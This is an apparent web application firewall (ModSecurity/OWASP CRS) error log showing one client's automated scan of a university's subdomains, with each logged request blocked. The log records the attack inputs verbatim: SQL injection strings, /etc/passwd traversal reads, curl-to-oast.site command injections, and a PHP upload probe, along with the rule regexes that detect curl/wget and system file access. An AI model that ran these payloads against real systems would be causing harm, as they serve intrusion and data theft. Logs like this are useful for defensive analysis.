[Tue Aug 29 11:30:56.405614 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPRNeEAAAAf"]
[Tue Aug 29 11:30:57.409309 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gcCo-f0AAAN@5BkAAAAO"]
[Tue Aug 29 11:30:57.428873 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gcCo-f0AAAPLwCMAAAAX"]
[Tue Aug 29 11:30:58.303562 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAP05H0AAAAA"]
[Tue Aug 29 11:30:58.380752 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPxBWsAAAAS"]
[Tue Aug 29 11:30:58.384793 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPMmFgAAAAY"]
[Tue Aug 29 11:30:58.408609 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPLwCkAAAAX"]
[Tue Aug 29 11:30:58.423801 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPRNekAAAAf"]
[Tue Aug 29 11:30:58.451816 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPPS0AAAAAd"]
[Tue Aug 29 11:30:58.491810 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPPS0EAAAAd"]
[Tue Aug 29 11:30:58.499373 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPDn3QAAAAP"]
[Tue Aug 29 11:30:58.518678 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAN@5CEAAAAO"]
[Tue Aug 29 11:30:58.544579 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPPS0MAAAAd"]
[Tue Aug 29 11:30:58.546489 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAP05IQAAAAA"]
[Tue Aug 29 11:30:59.315760 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgswkbs3jkjz7a7.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAO87-sAAAAF"]
[Tue Aug 29 11:30:59.316688 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlg8z1m1rs6zoxr4.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAP05IUAAAAA"]
[Tue Aug 29 11:30:59.316707 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgosaiz76ce776p.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAPRNe0AAAAf"]
[Tue Aug 29 11:30:59.359029 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAOM4b4AAAAU"]
[Tue Aug 29 11:30:59.398942 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAPMmF0AAAAY"]
[Tue Aug 29 11:30:59.428099 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgsmjgeswfdnj9z.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAOM4cEAAAAU"]
[Tue Aug 29 11:30:59.492032 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10g8Co-f0AAAOKNtsAAAAK"]
[Tue Aug 29 11:30:59.526306 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10g8Co-f0AAAOM4cMAAAAU"]
[Tue Aug 29 11:30:59.545154 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAN@5CcAAAAO"]
[Tue Aug 29 11:30:59.548977 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlga6yrr7xe9myjb.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAOKNtwAAAAK"]
[Tue Aug 29 11:30:59.570611 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAOKNt0AAAAK"]
[Tue Aug 29 11:31:00.305146 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgu4f76dwh99f9s.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10hMCo-f0AAAO87-8AAAAF"]
[Tue Aug 29 11:31:00.333650 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10hMCo-f0AAAO88AAAAAAF"]
[Tue Aug 29 11:31:00.341685 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10hMCo-f0AAAPOhd0AAAAa"]
[Tue Aug 29 11:31:01.478673 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10hcCo-f0AAAOM4csAAAAU"]
[Tue Aug 29 11:31:01.609209 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP05JIAAAAA"]
[Tue Aug 29 11:31:01.643999 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP05JMAAAAA"]
[Tue Aug 29 11:31:01.682096 2023] [:error] [pid 1015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP3Ol8AAAAH"]
[Tue Aug 29 11:31:02.715451 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10hsCo-f0AAAP5mGQAAAAM"]
[Tue Aug 29 11:31:02.742380 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgej5xqi86bur5r.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10hsCo-f0AAAP4H8wAAAAI"]
